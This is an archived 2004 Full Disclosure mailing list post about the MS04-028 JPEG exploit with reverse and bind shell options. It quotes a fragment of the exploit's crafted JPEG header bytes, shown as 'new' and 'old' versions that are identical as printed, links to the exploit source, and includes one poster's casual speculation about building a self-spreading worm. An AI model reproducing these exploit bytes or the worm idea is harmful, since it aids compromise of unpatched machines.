Full Disclosure mailing list archives
RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ...
From: "Castigliola, Angelo" <ACastigliola () unumprovident com>
Date: Mon, 27 Sep 2004 16:29:58 -0400
Eh, It would not be that hard to write up something that could revisit all of the computers that hit the web server to infect them with something after the initial jpg exploit was ran. It would truly be a one of a kind worm. Reason enough in itself to motivate someone to write it. As far as Media hype. I'm all for it. It keeps the IT job market strong. Angelo Castigliola III Operations Technical Analyst I UnumProvident IT Services 207.575.3820 -----Original Message----- From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of morning_wood Sent: Saturday, September 25, 2004 2:06 PM To: full-disclosure () lists netsys com Subject: Re: [Full-disclosure] MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... umm, no all this has thats different is correct headers for bind or remote shell option. and ability to set ports and return ip in the code, instead of needing to use your own shellcode ( or metasploits ) note: there is no new exploit code or vector ------------------- / snip /----------------- new. char header1[] = "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- old. ------------------- / snip /----------------- char header1[]= "\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64" "\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00" "\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65" "\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19" "\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26" "\x2E\x3E\x35\x35\x35\x35\x35\x3E"; ------------------- / snip /----------------- take your media hype and die kthnx, m.wood
the last step before the worm http://www.k-otik.com/exploits/09252004.JpegOfDeath.c.php
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... ElviS .de (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Ali Campbell (Sep 25)
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... raza (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Filbert (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT - msn i.t (Sep 26)
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... raza (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Ali Campbell (Sep 25)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... morning_wood (Sep 25)
- <Possible follow-ups>
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Castigliola, Angelo (Sep 27)
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... Todd Towles (Sep 27)
- Re: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... GuidoZ (Sep 28)
- RE: MS04-028 Jpeg EXPLOIT with Reverse and Bind shell ... r00t3d (Sep 29)